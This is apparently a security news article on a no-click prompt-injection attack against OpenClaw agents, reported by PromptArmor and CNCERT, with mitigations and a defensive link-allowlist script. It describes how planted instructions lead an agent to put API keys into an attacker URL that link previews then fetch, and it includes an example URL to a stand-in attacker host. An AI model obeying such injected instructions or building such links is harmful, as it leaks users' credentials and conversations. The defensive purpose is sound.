OpenClaw AI agents face significant security challenges, particularly vulnerabilities that leak data through indirect prompt injection attacks. These flaws can turn routine agent operations into covert channels for data exfiltration, posing considerable risk to enterprises.
Understanding the Vulnerability
The primary concern is not merely that AI models can be confused, but that they can be manipulated into extracting sensitive data without any user intervention. Security firm PromptArmor has demonstrated a sophisticated method in which attackers exploit OpenClaw agents by combining indirect prompt injections with messaging app features.
The Mechanism of No-Click Attacks
In these attacks, malicious instructions are embedded in content the AI agent is expected to read. Upon processing it, the agent constructs a URL controlled by the attacker, appending sensitive information such as API keys or private conversations to the URL's query parameters. The malicious link is then sent to the user through messaging platforms such as Telegram or Discord.
Critically, these platforms' link-preview features fetch URLs automatically, allowing the attack to succeed without any user interaction. This behavior enables a dangerous no-click attack, in which the agent's own response becomes the conduit for data exfiltration.
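To make the mechanism concrete, the sketch below uses Python's standard `urllib.parse` to dissect a hypothetical exfiltration link of the kind described above (the domain `attacker.example` and the parameter names are illustrative, not taken from the PromptArmor report). Everything after the `?` travels to the attacker's server in the request itself, so a single automated preview fetch is enough to deliver the secrets.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical link an injected instruction might make the agent emit:
# secrets are smuggled out as ordinary-looking query parameters.
suspect_link = "https://attacker.example/collect?api_key=sk-12345&chat=meeting+notes"

parts = urlsplit(suspect_link)
params = parse_qs(parts.query)

# The query string reaches attacker.example even if the URL is only
# fetched by a messaging app's automatic link preview.
print(parts.hostname)        # attacker.example
print(params["api_key"][0])  # sk-12345
print(params["chat"][0])     # meeting notes
```

The same parsing logic is useful defensively: a proxy or log pipeline can split outbound URLs this way and flag query values that look like credentials.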
Assessing the Risks
According to CNCERT, OpenClaw’s default security settings contribute significantly to enterprise risk, allowing agents to browse, execute tasks, and interact with local files. They categorize threats into indirect prompt injections from external data, accidental destructive actions, malicious third-party activities, and exploitation of known vulnerabilities.
The potential for damage is heightened by OpenClaw’s autonomy, making any compromise more severe. Messaging integration and auto-preview features create seamless data theft pathways, while access to hosts and containers can lead to real-world system manipulation. Additionally, unvetted extensions and proximity to operational credentials expand the attack surface.
Mitigation Strategies
Security teams should address this issue as an architectural concern rather than a simple bug. Recommended measures include disabling auto-preview features in messaging apps like Telegram and Discord, isolating OpenClaw runtimes within secure containers, and keeping default ports off public networks.
Further precautions involve restricting unnecessary file system access, ensuring credentials are not stored in plaintext, and only installing agent skills from verified sources. Network monitoring should be implemented to alert on agent-generated links pointing to unknown domains.
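The alerting recommendation above can be sketched as a simple allowlist check on agent output. This is a minimal illustration, not a production monitor: the allowlist contents, the message text, and the function name are assumptions, and a real deployment would hook into a proxy or SIEM rather than scan strings directly.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; in practice this comes from security policy.
ALLOWED_DOMAINS = {"example.com", "docs.example.com"}

URL_RE = re.compile(r"https?://[^\s<>\"']+")

def flag_unknown_links(agent_message: str) -> list[str]:
    """Return URLs in an agent-generated message whose domain is not allowlisted."""
    flagged = []
    for url in URL_RE.findall(agent_message):
        host = urlsplit(url).hostname or ""
        # Accept exact matches and subdomains of allowlisted domains.
        if host not in ALLOWED_DOMAINS and not host.endswith(
            tuple("." + d for d in ALLOWED_DOMAINS)
        ):
            flagged.append(url)
    return flagged

message = "Your notes: https://attacker.example/c?k=sk-123 and https://docs.example.com/page"
print(flag_unknown_links(message))  # ['https://attacker.example/c?k=sk-123']
```

Alerting on flagged links before a message leaves the agent closes the preview-fetch window that makes the no-click attack work.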
Ultimately, the critical question for security professionals is not whether an AI model can be manipulated, but what a manipulated agent might silently accomplish next. Proactive steps are essential to safeguard sensitive data and maintain system integrity.
